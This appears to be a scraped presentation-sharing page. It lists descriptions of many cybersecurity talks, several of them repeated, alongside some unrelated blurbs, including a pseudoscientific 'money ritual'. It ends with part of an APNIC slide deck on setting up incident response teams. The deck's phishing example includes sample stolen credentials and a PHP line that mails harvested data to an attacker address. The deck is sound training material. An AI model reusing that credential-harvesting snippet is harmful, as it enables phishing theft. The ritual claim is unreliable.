Application Security - Your Success Depends on itWSO2
Traditional information security mainly revolves around network and operating system (OS) level protection. Regardless of the level of security guarding those aspects, the system can be penetrated and the entire deployment can be brought down if your application's security isn't taken into serious consideration. Information security should ideally start at the application level, before network and OS level security is ensured. To achieve this, security needs to be integrated into the application at the software development phase.
In this session, Dulanja will discuss the following:
The importance of application security - why network and OS security is insufficient.
Challenges in securing your application.
Making security part of the development lifecycle.
Building a Next-Generation Security Operations Center (SOC)Sqrrl
So, you need to build a Security Operations Center (SOC)? What does that mean? What does the modern SOC need to do? Learn from Dr. Terry Brugger, who has been doing information security work for over 15 years, including building out a SOC for a large Federal agency and consulting for numerous large enterprises on their security operations.
Watch the presentation with audio here: http://info.sqrrl.com/sqrrl-october-webinar-next-generation-soc
Secrets to managing your Duty of Care in an ever- changing world.
How well do you know your risks?
Are you keeping up with your responsibilities to provide Duty of Care?
How well are you prioritising Cybersecurity initiatives?
Liability for Cybersecurity attacks sits with Executives and Board members who may not have the right level of technical security knowledge. This session will outline what practical steps executives can take to implement a Cybersecurity Roadmap that is aligned with its strategic objectives.
Led by Krist Davood, who has spent over 28 years implementing secure mission critical systems for executives. Krist is an expert in protecting the interconnectedness of technology, intellectual property and information systems, as evidenced through his roles at The Good Guys, Court Services Victoria and Schiavello.
The seminar will cover:
• Fiduciary responsibility
• How to efficiently deal with personal liability and the threat of court action
• The role of a Cybersecurity Executive Dashboard and its ability to simplify risk and amplify informed decision making
• How to identify and bridge the gap between your Cybersecurity Compliance Rating and the threat of court action
Introduction to Web Application Penetration TestingAnurag Srivastava
Web Application Pentesting
* Process to check and penetrate the security of a web application or a website
* process involves an active analysis of the application for any weaknesses, technical flaws, or vulnerabilities
* Any security issues that are found will be presented to the system owner, together with an assessment of the impact, a proposal for mitigation or a technical solution.
Application Security - Your Success Depends on itWSO2
Traditional information security mainly revolves around network and operating system (OS) level protection. Regardless of the level of security guarding those aspects, the system can be penetrated and the entire deployment can be brought down if your application's security isn't taken into serious consideration. Information security should ideally start at the application level, before network and OS level security is ensured. To achieve this, security needs to be integrated into the application at the software development phase.
In this session, Dulanja will discuss the following:
The importance of application security - why network and OS security is insufficient.
Challenges in securing your application.
Making security part of the development lifecycle.
Building a Next-Generation Security Operations Center (SOC)Sqrrl
So, you need to build a Security Operations Center (SOC)? What does that mean? What does the modern SOC need to do? Learn from Dr. Terry Brugger, who has been doing information security work for over 15 years, including building out a SOC for a large Federal agency and consulting for numerous large enterprises on their security operations.
Watch the presentation with audio here: http://info.sqrrl.com/sqrrl-october-webinar-next-generation-soc
Secrets to managing your Duty of Care in an ever- changing world.
How well do you know your risks?
Are you keeping up with your responsibilities to provide Duty of Care?
How well are you prioritising Cybersecurity initiatives?
Liability for Cybersecurity attacks sits with Executives and Board members who may not have the right level of technical security knowledge. This session will outline what practical steps executives can take to implement a Cybersecurity Roadmap that is aligned with its strategic objectives.
Led by Krist Davood, who has spent over 28 years implementing secure mission critical systems for executives. Krist is an expert in protecting the interconnectedness of technology, intellectual property and information systems, as evidenced through his roles at The Good Guys, Court Services Victoria and Schiavello.
The seminar will cover:
• Fiduciary responsibility
• How to efficiently deal with personal liability and the threat of court action
• The role of a Cybersecurity Executive Dashboard and its ability to simplify risk and amplify informed decision making
• How to identify and bridge the gap between your Cybersecurity Compliance Rating and the threat of court action
Introduction to Web Application Penetration TestingAnurag Srivastava
Web Application Pentesting
* Process to check and penetrate the security of a web application or a website
* process involves an active analysis of the application for any weaknesses, technical flaws, or vulnerabilities
* Any security issues that are found will be presented to the system owner, together with an assessment of the impact, a proposal for mitigation or a technical solution.
Talking about Next-Gen Security Operation Center for IDNIC+APJII as representative from IDSECCONF. People-Centric SOC requires lot of investment on human in terms of quantity and quality, unfortunately, (good) IT security people are getting rare these days. Organisation need to put their investments more on technology, as in Industry 4.0, machines are getting more advanced to support Human on doing continuous and repetitive task.
Moving from “traditional” to next-gen SOC require proper plan, thats what this talk was about.
( ** Cyber Security Training: https://www.edureka.co/cybersecurity-certification-training ** )
This Edureka PPT on "Penetration Testing" will help you understand all about penetration testing, its methodologies, and tools. Below is the list of topics covered in this session:
What is Penetration Testing?
Phases of Penetration Testing
Penetration Testing Types
Penetration Testing Tools
How to perform Penetration Testing on Kali Linux?
Cyber Security Playlist: https://bit.ly/2N2jlNN
Cyber Security Blog Series: https://bit.ly/2AuULkP
Instagram: https://www.instagram.com/edureka_lea...
Facebook: https://www.facebook.com/edurekaIN/
Twitter: https://twitter.com/edurekain
LinkedIn: https://www.linkedin.com/company/edureka
An introductory overview of cybersecurity covering technical and non-technical aspects of cybersecurity.
We define what is cybersecurity, we talk about risks and impacts of a cybersecurity breach and present means to avoid it both in term of regulations (Common criteria, FIPS, ...). We continue with technology and some cryptography and we finish by some fact numbers.
Infections cost organizations billions of dollars in lost time and productivity, as well as ransom payments and other indirect costs, like damage to a business’s reputation.
End-users will learn about password management, multi-factor authentication and how to secure their laptops and desktops while working remotely.
This session will teach professionals how to avoid becoming a statistic.
Agenda: Foundations of security awareness | Common threats | Three ways to secure your work environment | Best practices for users | The work from home checklist
** CyberSecurity Certification Training: https://www.edureka.co/cybersecurity-certification-training **
This Edureka tutorial on "Cybersecurity Frameworks" will help you understand why and how the organizations are using the cybersecurity framework to Identify, Protect and Recover from cyber attacks.
Cybersecurity Training Playlist: https://bit.ly/2NqcTQV
From SIEM to SOC: Crossing the Cybersecurity ChasmPriyanka Aash
You own a SIEM, but to be secure, you need a Security Operations Center! How do you cross the chasm? Do you hire staff or outsource? And what skills are needed? Mike Ostrowski, a cybersecurity industry veteran, will review common pitfalls experienced through the journey from SIEM to SOC, the pros and cons of an all in-house SOC vs. outsourcing, and the benefits of a hybrid SOC model.
Learning Objectives:
1: You own a SIEM, but to be secure, you need a SOC. How do you cross the chasm?
2: What are the pros and cons of in-house, fully managed and hybrid security?
3: What considerations go into deciding whether to employ a hybrid strategy?
(Source: RSA Conference USA 2018)
Cyber Security 101: Training, awareness, strategies for small to medium sized...Stephen Cobb
I developed "Cyber Security 101: Training, awareness, strategies for small to medium sized business" for the second annual Small Business Summit on Security, Privacy, and Trust, co-hosted by ADP in New Jersey, October 2013.
Planning and Deploying an Effective Vulnerability Management ProgramSasha Nunke
This presentation covers the essential components of a successful Vulnerability Management program that allows you proactively identify risk to protect your network and critical business assets.
Key take-aways:
* Integrating the 3 critical factors - people, processes & technology
* Saving time and money via automated tools
* Anticipating and overcoming common Vulnerability Management roadblocks
* Meeting security regulations and compliance requirements with Vulnerability Management
SOC Architecture - Building the NextGen SOCPriyanka Aash
Why are APTs difficult to detect
Revisit the cyber kill chain
Process orient detection
NextGen SOC Process
Building your threat mind map
Implement and measure your SOC
Cyber Threat Intelligence is a process in which information from different sources is collected, then analyzed to identify and detect threats against any environment. The information collected could be evidence-based knowledge that could support the context, mechanism, indicators, or implications about an already existing threat against an environment, and/or the knowledge about an upcoming threat that could potentially affect the environment. Credit: Marlabs Inc
Secure web programming plus end users' awareness are the last line of defense against attacks targeted at the corporate systems, particularly web applications, in the era of world-wide web.
Most web application attacks occur through Cross Site Scripting (XSS), and SQL Injection. On the other hand, most web application vulnerabilities arise from weak coding with failure to properly validate users' input, and failure to properly sanitize output while displaying the data to the visitors.
The literature also confirms the following web application weaknesses in 2010: 26% improper output handling, 22% improper input handling, and 15% insufficient authentication, and others.
Abdul Rahman Sherzad, lecturer at Computer Science Faculty of Herat University, and Ph.D. student at Technical University of Berlin gave a presentation at 12th IT conference on Higher Education for Afghanistan in MoHE, and then conducted a seminar at Hariwa Institute of Higher Education in Herat, Afghanistan introducing web application security threats by demonstrating the security problems that exist in corporate systems with a strong emphasis on secure development. Major security vulnerabilities, secure design and coding best practices when designing and developing web-based applications were covered.
The main objective of the presentation was raising awareness about the problems that might occur in web-application systems, as well as secure coding practices and principles. The presentation's aims were to build security awareness for web applications, to discuss the threat landscape and the controls users should use during the software development lifecycle, to introduce attack methods, to discuss approaches for discovering security vulnerabilities, and finally to discuss the basics of secure web development techniques and principles.
Talking about Next-Gen Security Operation Center for IDNIC+APJII as representative from IDSECCONF. People-Centric SOC requires lot of investment on human in terms of quantity and quality, unfortunately, (good) IT security people are getting rare these days. Organisation need to put their investments more on technology, as in Industry 4.0, machines are getting more advanced to support Human on doing continuous and repetitive task.
Moving from “traditional” to next-gen SOC require proper plan, thats what this talk was about.
( ** Cyber Security Training: https://www.edureka.co/cybersecurity-certification-training ** )
This Edureka PPT on "Penetration Testing" will help you understand all about penetration testing, its methodologies, and tools. Below is the list of topics covered in this session:
What is Penetration Testing?
Phases of Penetration Testing
Penetration Testing Types
Penetration Testing Tools
How to perform Penetration Testing on Kali Linux?
Cyber Security Playlist: https://bit.ly/2N2jlNN
Cyber Security Blog Series: https://bit.ly/2AuULkP
Instagram: https://www.instagram.com/edureka_lea...
Facebook: https://www.facebook.com/edurekaIN/
Twitter: https://twitter.com/edurekain
LinkedIn: https://www.linkedin.com/company/edureka
An introductory overview of cybersecurity covering technical and non-technical aspects of cybersecurity.
We define what is cybersecurity, we talk about risks and impacts of a cybersecurity breach and present means to avoid it both in term of regulations (Common criteria, FIPS, ...). We continue with technology and some cryptography and we finish by some fact numbers.
Infections cost organizations billions of dollars in lost time and productivity, as well as ransom payments and other indirect costs, like damage to a business’s reputation.
End-users will learn about password management, multi-factor authentication and how to secure their laptops and desktops while working remotely.
This session will teach professionals how to avoid becoming a statistic.
Agenda: Foundations of security awareness | Common threats | Three ways to secure your work environment | Best practices for users | The work from home checklist
** CyberSecurity Certification Training: https://www.edureka.co/cybersecurity-certification-training **
This Edureka tutorial on "Cybersecurity Frameworks" will help you understand why and how the organizations are using the cybersecurity framework to Identify, Protect and Recover from cyber attacks.
Cybersecurity Training Playlist: https://bit.ly/2NqcTQV
From SIEM to SOC: Crossing the Cybersecurity ChasmPriyanka Aash
You own a SIEM, but to be secure, you need a Security Operations Center! How do you cross the chasm? Do you hire staff or outsource? And what skills are needed? Mike Ostrowski, a cybersecurity industry veteran, will review common pitfalls experienced through the journey from SIEM to SOC, the pros and cons of an all in-house SOC vs. outsourcing, and the benefits of a hybrid SOC model.
Learning Objectives:
1: You own a SIEM, but to be secure, you need a SOC. How do you cross the chasm?
2: What are the pros and cons of in-house, fully managed and hybrid security?
3: What considerations go into deciding whether to employ a hybrid strategy?
(Source: RSA Conference USA 2018)
Cyber Security 101: Training, awareness, strategies for small to medium sized...Stephen Cobb
I developed "Cyber Security 101: Training, awareness, strategies for small to medium sized business" for the second annual Small Business Summit on Security, Privacy, and Trust, co-hosted by ADP in New Jersey, October 2013.
Planning and Deploying an Effective Vulnerability Management ProgramSasha Nunke
This presentation covers the essential components of a successful Vulnerability Management program that allows you proactively identify risk to protect your network and critical business assets.
Key take-aways:
* Integrating the 3 critical factors - people, processes & technology
* Saving time and money via automated tools
* Anticipating and overcoming common Vulnerability Management roadblocks
* Meeting security regulations and compliance requirements with Vulnerability Management
SOC Architecture - Building the NextGen SOCPriyanka Aash
Why are APTs difficult to detect
Revisit the cyber kill chain
Process orient detection
NextGen SOC Process
Building your threat mind map
Implement and measure your SOC
Cyber Threat Intelligence is a process in which information from different sources is collected, then analyzed to identify and detect threats against any environment. The information collected could be evidence-based knowledge that could support the context, mechanism, indicators, or implications about an already existing threat against an environment, and/or the knowledge about an upcoming threat that could potentially affect the environment. Credit: Marlabs Inc
Secure web programming plus end users' awareness are the last line of defense against attacks targeted at the corporate systems, particularly web applications, in the era of world-wide web.
Most web application attacks occur through Cross Site Scripting (XSS), and SQL Injection. On the other hand, most web application vulnerabilities arise from weak coding with failure to properly validate users' input, and failure to properly sanitize output while displaying the data to the visitors.
The literature also confirms the following web application weaknesses in 2010: 26% improper output handling, 22% improper input handling, and 15% insufficient authentication, and others.
Abdul Rahman Sherzad, lecturer at Computer Science Faculty of Herat University, and Ph.D. student at Technical University of Berlin gave a presentation at 12th IT conference on Higher Education for Afghanistan in MoHE, and then conducted a seminar at Hariwa Institute of Higher Education in Herat, Afghanistan introducing web application security threats by demonstrating the security problems that exist in corporate systems with a strong emphasis on secure development. Major security vulnerabilities, secure design and coding best practices when designing and developing web-based applications were covered.
The main objective of the presentation was raising awareness about the problems that might occur in web-application systems, as well as secure coding practices and principles. The presentation's aims were to build security awareness for web applications, to discuss the threat landscape and the controls users should use during the software development lifecycle, to introduce attack methods, to discuss approaches for discovering security vulnerabilities, and finally to discuss the basics of secure web development techniques and principles.
Collaboration Between Infosec Community and CERT Teams : Project Sonar caseValdes Nzalli
Along with their day-to-day duties, CERT/CSIRT teams need to be aware about the security state of their subscribers/clients. My goal here is to present this initiative named "Project Sonar", started by many members of the Infosec Community. Also, i would like to present an use case in which the collaboration between the CERT/CSIRT team and the Infosec Community can be more profitable for all of us. This use case will be based on an analysis of some data provided by Project Sonar.
Etude Statistique d'un mois de Vulnérabilités en AfriqueValdes Nzalli
De plus en plus d'équipements se retrouvent de nos jours connecté à Internet, la baisse
des prix de la bande passante aidant, il est dorénavant plus facile d'héberger par
exemple un service soit même. Mais cette croissance n'est pas la même pour les
mesures de sécurité appliquées aux équipements connectés. Notre exposé aura pour
but de révéler les statistiques d'un audit de l'internet en Afrique sur une durée
mensuelle. Il nous a ainsi été possible d'identifier plusieurs cas comme les machines
membres de botnets, des serveur ouverts au public mais non patchés et bien d'autres.
De ces résultats nous avons fait un classement par pays, Application, Système,... ainsi
que leur fréquence.
Download this free beginner's guide to learning and mastering the basics of Chinese.
The pdf guide is more than 60 pages of vocabulary, grammar and lessons grouped around 20 basic questions & answers that you will want to master as a beginner. You can print it out to go through on your own or participate live at: http://studymorechinese.com/
Ethical Hacking and Cybersecurity – Key Trends in 2022PECB
In recent years, there has been a significant number of cyberattacks resulting in massive business disruptions.
In this regard, many organizations are hiring ethical hacking groups to help prevent future attacks.
Amongst others, the webinar covers:
• 2021 Cyber-incidents
• 2021 Black swans
• Ransomware vNext
• IoT - internet of things
• Cyber security insurance evolution
• Cyber best practices & frameworks
• The 2022 black swans
Presenter:
Our first presenter for this webinar is Peter Geelen, director and managing consultant at CyberMinute and Owner of Quest for Security, Belgium. Over more than 20 years, Peter has built strong experience in enterprise security & architecture, Identity & Access management, but also privacy, information & data protection, cyber- and cloud security. Last few years, the focus is on ISO/IEC 27001 and other ISO certification mechanisms. Peter is accredited Lead Auditor for ISO/IEC 27001, ISO 9001, PECB Trainer and Fellow in Privacy.
Our second presenter is Erwin AM Geirnaert, Co-founder and Chief Application Security Architect at Shift Left Security, a Belgian cybersecurity start-up specialized in securing start-ups, scale ups and SMBs against malicious cybercriminals. Erwin is a specialist in mobile security, J2EE security .NET security, API Security and web services security. Erwin has more than 20 years’ experience in executing security tests aka penetration testing of web applications, mobile apps, APIs and thick client applications. He is also a recognized application security expert and speaker at international events like Javapolis, LSEC, OWASP, Eurostar, Infosecurity, etc.
-------------------------------------------------------------------------------
Find out more about ISO training and certification services
Training: https://pecb.com/whitepaper/iso-27001-information-technology--security-techniques-information-security--management-systems---requirements
Webinars: https://pecb.com/webinars
Article: https://pecb.com/article
Whitepaper: https://pecb.com/whitepaper
-------------------------------------------------------------------------------
For more information about PECB:
Website: https://pecb.com/
LinkedIn: https://www.linkedin.com/company/pecb/
Facebook: https://www.facebook.com/PECBInternational/
Slideshare: http://www.slideshare.net/PECBCERTIFICATION
YouTube video: https://youtu.be/ZHQQ1yJX2uU
Website link: https://pecb.com/
Today's Breach Reality, The IR Imperative, And What You Can Do About ItResilient Systems
Despite changing threats and the near certainty of compromise, most
IT security programs are much the same as they were a decade ago. How
have attacker motivations and tactics changed, and why? What does
this mean for IT security departments, and how must they adapt?
This webinar will detail the security challenges organizations face
today, the implications of changes in attacker tactics and
motivations, and what firms can do to better align their security
program with today's reality.
Our featured speakers for this webinar will be:
- Ted Julian, Chief Marketing Officer, Co3 Systems
- Colby Clark, Director of Incident Management, Fishnet Security
Protecting Your Business - All Covered Security ServicesAll Covered
All Covered is a nationwide provider of IT services and security. This presentation highlights the most essential factors that businesses need to be aware of when implementing their security plan. It shows how any company, regardless of size, is at risk with external, and internal, security threats.
Whether you own a small, medium, or large business, IT security should be at the forefront of any discussion. It is better to be proactive and prevent an attack from happening than having to pick up the pieces after the damage has already been done to your business.
2017 Q1 Arcticcon - Meet Up - Adventures in Adversarial EmulationScott Sutherland
This presentation provides an overview off common adversarial emulation approaches along with attack and detection trends. It should be interesting to penetration testers and professionals in security operations roles.
ASEAN-JAPAN Cyber Security Seminar: How to fill your team gaps with trainingAPNIC
APNIC Senior Security Specialist Adli Wahid presents on identifying skill gaps and how to meet them at the ASEAN-JAPAN Cyber Security Seminar, held online on 11 August 2021.
Cybersecurity: Malware & Protecting Your Business From CyberthreatsSecureDocs
http://www.securedocs.com -The recent increase in high-profile cyberattacks has made online security a hot topic, and rightfully so. Companies from The New York Times to Facebook have fallen victim to attacks by cybercriminals, highlighting just how vulnerable any business is. In the past few years, malware has evolved dramatically and is a serious threat to all organizations, both big and small.
This presentation covers what advanced malware is and the impact it can have on an organization. Learn how to protect your business from this type of threat.
Security is now important to all of us, not just people who work at Facebook. Most developers think about security in terms of security technologies that they want to apply to their systems, and then ask how secure the system is. From a secure systems perspective, this is the wrong way around. To build a secure system, you need to start from the things that need to be protected and the threats to those resources.
In this session, Eoin dives into the fundamentals of system security to introduce the topics we need to understand in order to decide how to secure our systems.
This presentation was delivered at SkyDogCon 6 in October 2016. The A/V is available here: https://www.youtube.com/watch?list=PLLEf-wPc7Tyae19iTuzKOXmPj-IQBIWuU&v=mKxGulV2Z74
It is an updated version of the original deck presented at BSides Augusta 2016 - Added original content including information on use cases and added definition/clarity.
Abstract:
"We can all agree that threat ("Evil") detection is an essential component of a functioning security monitoring program. Let's start thinking about how to take our tradecraft to the next level and hunt for insecure conditions ("Ways for Evil to do Evil things") that might allow threat actors to succeed in their mission.
This talk will run through some of the observations gathered during hunting expeditions inside the networks of multiple Fortune-ranked organizations and challenge you to expand your security operations thinking beyond signature-based detection.
- What is Hunting?
- How have we done it?
- What have we found, and what should be done about those findings?
- How might you achieve similar outcomes in your own environment?"
Speakers:
- Jacqueline Stokes (@find_evil) is an infosec enthusiast who picked up hacking as a preteen and cut her teeth over multiple years in Iraq. Her ongoing mission is to assess and advise clients on the most actionable and forward-thinking methods to improve detection, response, and containment of advanced threats. Jackie likes long walks on the beach, 90's nostalgia, and is the president and founding member of the Kevin Mandia Fan Club.
My incident Response from Techfair 2016 in Jersey. The talk explores how incident response could to comply with the requirements set out in the Jersey Financial Services Commission Dear CEO letter on cyber security.
Dave Beesley, Technical Director, Novosco, presented at Cloud Expo 2017 on 'Delivering security services in the new world. Held at the ExCeL, in London's Docklands.
Applications are constantly under attack. Unfortunately, nearly all applications have no capability of detecting an attacker or responding before a breach occurs. Those applications sit passively and allow the attacker to constantly unleash attack after attack. Let's change the game and equip our application with the resources to detect an attack with high accuracy and respond in real time to prevent a compromise by eliminating the threat from the system.
In this talk we'll cover the OWASP AppSensor project – a project that details how to instrument an application to become attack aware and immediately respond to neutralize threats. This project is backed by multiple talented security experts that have been advancing the project for the past three years. AppSensor has been featured in the Department of Defense Cross Talk journal, presented at the US Department of Homeland Security resilient software conference and at security conferences around the world.
Cambodia CERT Seminar: Incident response for ransomeware attacksAPNIC
Senior Security Specialist Adli Wahid presents on incident response for ransomeware attacks at the Cambodia CERT Seminar, held online on 13 August 2021.
Hunting: Defense Against The Dark Arts - BSides Philadelphia - 2016Danny Akacki
We can all agree that threat detection is an essential component of a functioning security monitoring program. Let's start thinking about how to take our tradecraft to the next level and hunt for ways for evil to do evil things. This talk will run through some of the observations gathered during hunting expeditions inside the networks of multiple Fortune ranked organizations. We hope to challenge you to expand your security operations, moving beyond traditional signature based detection.
APNIC Foundation, presented by Ellisha Heppner at the PNG DNS Forum 2024APNIC
Ellisha Heppner, Grant Management Lead, presented an update on APNIC Foundation to the PNG DNS Forum held from 6 to 10 May, 2024 in Port Moresby, Papua New Guinea.
Registry Data Accuracy Improvements, presented by Chimi Dorji at SANOG 41 / I...APNIC
Chimi Dorji, Internet Resource Analyst at APNIC, presented on Registry Data Accuracy Improvements at SANOG 41 jointly held with INNOG 7 in Mumbai, India from 25 to 30 April 2024.
APNIC Policy Roundup, presented by Sunny Chendi at the 5th ICANN APAC-TWNIC E...APNIC
Sunny Chendi, Senior Advisor, Membership and Policy at APNIC, presents 'APNIC Policy Roundup' at the 5th ICANN APAC-TWNIC Engagement Forum and 41st TWNIC OPM in Taipei, Taiwan from 23 to 24 April.
DDoS In Oceania and the Pacific, presented by Dave Phelan at NZNOG 2024APNIC
Dave Phelan, Senior Network Analyst/Technical Trainer at APNIC, presents 'DDoS In Oceania and the Pacific' at NZNOG 2024 held in Nelson, New Zealand from 8 to 12 April 2024.
'Future Evolution of the Internet' delivered by Geoff Huston at Everything Op...APNIC
Geoff Huston, Chief Scientist at APNIC deliver keynote presentation on the 'Future Evolution of the Internet' at the Everything Open 2024 conference in Gladstone, Australia from 16 to 18 April 2024.
IP addressing and IPv6, presented by Paul Wilson at IETF 119APNIC
Paul Wilson, Director General of APNIC delivers a presentation on IP addressing and IPv6 to the Policymakers Program during IETF 119 in Brisbane Australia from 16 to 22 March 2024.
draft-harrison-sidrops-manifest-number-01, presented at IETF 119APNIC
Tom Harrison, Product and Delivery Manager at APNIC presents at the Registration Protocols Extensions working group during IETF 119 in Brisbane, Australia from 16-22 March 2024
Benefits of doing Internet peering and running an Internet Exchange (IX) pres...APNIC
Che-Hoo Cheng, Senior Director, Development at APNIC presents on the "Benefits of doing Internet peering and running an Internet Exchange (IX)" at the Communications Regulatory Commission of Mongolia's IPv6, IXP, Datacenter - Policy and Regulation International Trends Forum in Ulaanbaatar, Mongolia on 7 March 2024
APNIC Update and RIR Policies for ccTLDs, presented at APTLD 85APNIC
APNIC Senior Advisor, Membership and Policy, Sunny Chendi presented on APNIC updates and RIR Policies for ccTLDs at APTLD 85 in Goa, India from 19-22 February 2024.
Bridging the Digital Gap Brad Spiegel Macon, GA Initiative.pptxBrad Spiegel Macon GA
Brad Spiegel Macon GA’s journey exemplifies the profound impact that one individual can have on their community. Through his unwavering dedication to digital inclusion, he’s not only bridging the gap in Macon but also setting an example for others to follow.
This 7-second Brain Wave Ritual Attracts Money To You.!nirahealhty
Discover the power of a simple 7-second brain wave ritual that can attract wealth and abundance into your life. By tapping into specific brain frequencies, this technique helps you manifest financial success effortlessly. Ready to transform your financial future? Try this powerful ritual and start attracting money today!
1.Wireless Communication System_Wireless communication is a broad term that i...JeyaPerumal1
Wireless communication involves the transmission of information over a distance without the help of wires, cables or any other forms of electrical conductors.
Wireless communication is a broad term that incorporates all procedures and forms of connecting and communicating between two or more devices using a wireless signal through wireless communication technologies and devices.
Features of Wireless Communication
The evolution of wireless technology has brought many advancements with its effective features.
The transmitted distance can be anywhere between a few meters (for example, a television's remote control) and thousands of kilometers (for example, radio communication).
Wireless communication can be used for cellular telephony, wireless access to the internet, wireless home networking, and so on.
Multi-cluster Kubernetes Networking- Patterns, Projects and GuidelinesSanjeev Rampal
Talk presented at Kubernetes Community Day, New York, May 2024.
Technical summary of Multi-Cluster Kubernetes Networking architectures with focus on 4 key topics.
1) Key patterns for Multi-cluster architectures
2) Architectural comparison of several OSS/ CNCF projects to address these patterns
3) Evolution trends for the APIs of these projects
4) Some design recommendations & guidelines for adopting/ deploying these solutions.
# Internet Security: Safeguarding Your Digital World
In the contemporary digital age, the internet is a cornerstone of our daily lives. It connects us to vast amounts of information, provides platforms for communication, enables commerce, and offers endless entertainment. However, with these conveniences come significant security challenges. Internet security is essential to protect our digital identities, sensitive data, and overall online experience. This comprehensive guide explores the multifaceted world of internet security, providing insights into its importance, common threats, and effective strategies to safeguard your digital world.
## Understanding Internet Security
Internet security encompasses the measures and protocols used to protect information, devices, and networks from unauthorized access, attacks, and damage. It involves a wide range of practices designed to safeguard data confidentiality, integrity, and availability. Effective internet security is crucial for individuals, businesses, and governments alike, as cyber threats continue to evolve in complexity and scale.
### Key Components of Internet Security
1. **Confidentiality**: Ensuring that information is accessible only to those authorized to access it.
2. **Integrity**: Protecting information from being altered or tampered with by unauthorized parties.
3. **Availability**: Ensuring that authorized users have reliable access to information and resources when needed.
## Common Internet Security Threats
Cyber threats are numerous and constantly evolving. Understanding these threats is the first step in protecting against them. Some of the most common internet security threats include:
### Malware
Malware, or malicious software, is designed to harm, exploit, or otherwise compromise a device, network, or service. Common types of malware include:
- **Viruses**: Programs that attach themselves to legitimate software and replicate, spreading to other programs and files.
- **Worms**: Standalone malware that replicates itself to spread to other computers.
- **Trojan Horses**: Malicious software disguised as legitimate software.
- **Ransomware**: Malware that encrypts a user's files and demands a ransom for the decryption key.
- **Spyware**: Software that secretly monitors and collects user information.
### Phishing
Phishing is a social engineering attack that aims to steal sensitive information such as usernames, passwords, and credit card details. Attackers often masquerade as trusted entities in email or other communication channels, tricking victims into providing their information.
### Man-in-the-Middle (MitM) Attacks
MitM attacks occur when an attacker intercepts and potentially alters communication between two parties without their knowledge. This can lead to the unauthorized acquisition of sensitive information.
### Denial-of-Service (DoS) and Distributed Denial-of-Service (DDoS) Attacks
1. Issue Date:
Revision:
Setting up Computer
Security Incident Response
Teams (CSIRTS)
Adli Wahid
Security Specialist
adli@apnic.net
05 June 2014
V 1.1
2. About Me
• Adli Wahid
• Current Role
– Security Specialist, APNIC
• Previous Roles
– Cyber Security Manager, Bank of Tokyo-Mitsubishi UFJ
– VP Cyber Security Response Services, CyberSecurity Malaysia &
Head of Malaysia CERT (MYCERT)
– Lecturer, International Islamic University Malaysia
• Follow APNIC and me on Twitter!
– @apnic && @adliwahid
3
3. Agenda
• Cyber Threats Landscape
• Setting up Computer / Cyber Security Response Team
• Tools for incident handling and analysis
• Exercises
4
7. Cyber Security Frame Work
• How do we think about security?
• Ensuring the CIA
– Confidentiality, Integrity, Availability
• Collection of activities to address Risk
– Risk = Threats x Vulnerabilities
– Dealing with the Known & and Unknown
• People, Process, Technology
• Dynamic & Continuous Approach
– Including Learning from Incidents
– Applying Best Current Practices
8
C
I
A
9. The Threat Landscape
• Highlights of cyber security incidents
• What they mean for a CERT / CSIRT?
• Understanding risk and impact associated with the threats
or incidents
• Thinking about actions required for dealing with the
incidents
10
10. Cyber Threats
• Malware Related
• Data Breaches
• Distributed Denial of Service Attacks
• Web Defacement
• Spam
• Phishing
• Scanning / Attempts
• Content Related
11
11. Malware-Related
• The Problem
– Malicious software have different infection
vectors and ‘payloads’
– Different consequences once a computer is
infected
– Millions of infected Computers
– Complex ‘infrastructure’ for spreading malware
and controlling infected computers
12
12. Malware-Related
• Different Types of Malware
– Bots & Botnets
– Ransomware
– ExploitKits
• What do CSIRTs have to Handle?
– Infected computers
– Infection points
• Command & Controls
• Web Sites
– Organise Take-Downs Efforts (Conficker, DNSChanger)
– Write Advisory (for removal)
– Work with Law Enforcement Agencies
13
16. DoS and DDoS
• DoS:
– source of attack small # of nodes
– source IP typically spoofed
• DDoS
– From thousands of nodes
– IP addresses often not spoofed
• What you need to Handle
– Source of DDoS attack
• What if IP is spoofed?
– Victim of DDoS attack
– Services/Sites facilitating DDoS attacks
• Help promote BCP38 / Source Address Validation too!
17
19. DDoS: Reflection attack
• Spoof source IP address = victim’s IP
• Goal: generate lengthy or numerous replies for short
requests: amplification
– Without amplification: would it make sense?
• January 2001 attack:
– requests for large DNS record
– generated 60-90 Mbps of traffic
• Reflection attack can be also be done with Web and other
services
20
21. Data Breaches
• The Problem
– Thousands and Hundreds of Credentials (username and passwords)
being exposed and shared publicly
• By accident or or purpose
• i.e. on scribd
• CSIRTs/CERTs are contacted to handle / co-ordinate so
that accounts are not further abused
• Handling
– Contacting the owners of credentials
– Contacting owner of system where credentials are being dumped
• SQL injection vulnerability, Misconfiguration
– Improving authentication mechanism (2FA?)
– Removing the credentials
22
22. Phishing
• The Problem
– Active attempt to trick users to give credentials
– Use a combination of email, social media and fake websites
• What needs to be handled
– Source of Phishing Email
– Fake website
– Credentials stolen
– Accounts or sites collecting phishing credentials (drop sites)
23
23. Dear Intelligent User,
We have introduced a new
security feature on our website.
Please reactivate your account
here: http://www.bla.com.my
p.s This is NOT a Phish Email
Login
Password
din:1234567
joey:cherry2148
boss:abcdefgh123
finance:wky8767
admin:testtest123
<?
$mailto=‘criminal@gmail.com’;
mail($mailto,$subject,
$message);
?>
Phishing Example
24
1
2
3
4
24. Spam
• The Problem
– Unsolicited Emails
– Waste of bandwith, cost money
– Leads to other problems
• What you need to handle
– Source of email
25
27. Compromised Web Sites
• The Problem
– Web sites compromised leading to defacement or abused for other
types of attacks
– Possibly caused by
https://www.owasp.org/index.php/
Category:OWASP_Top_Ten_Project
– Mass Defacements
– Pre-Announced Attacks
• What you need to handle / co-ordinate
– Contacting owner of the website
– Handling the source of attack
28
28. Recap on Cyber Threats
• Understanding the different types of cyber threats is the first
step before you start handling or responding to the
incidents
• Abuse or IRT contacts could be the first to be contacted
• Questions to ask
– How does it work?
– What are the impact?
– What do we have to ‘handle’?
– Who should I contact / escalate?
– What should be prioritized?
• CSIRTS/CERTS can be contacted at the different stages of
the attacks or incidents
29
30. Outcomes of this Module
1. Understand the importance of responding and handling
security incidents
2. Familiar with the requirements for setting up a CERT /
CSIRT
3. Identify organisations to connect with for collaboration &
cooperation
31
32. Incidents Happens!
• Despite your best efforts keep the internet
safe, secure and reliable – things
happens
• What we have seen
– Malware, Botnets, Exploit Kits, Ramsomware,
DDoS Attacks, Anonymous, 0-days, Web
Defacement
– Data Breaches and Disclosures
– And Many more!
• What is the worst that can happen to
you?
33
33. Incident Happens! (2)
• Incident may affect
– Your Organisation
– Your Customers
– Your country (think Critical Infrastructure)
• Must be managed in order to
– Limit Damage
– Recover (Fix/Patch)
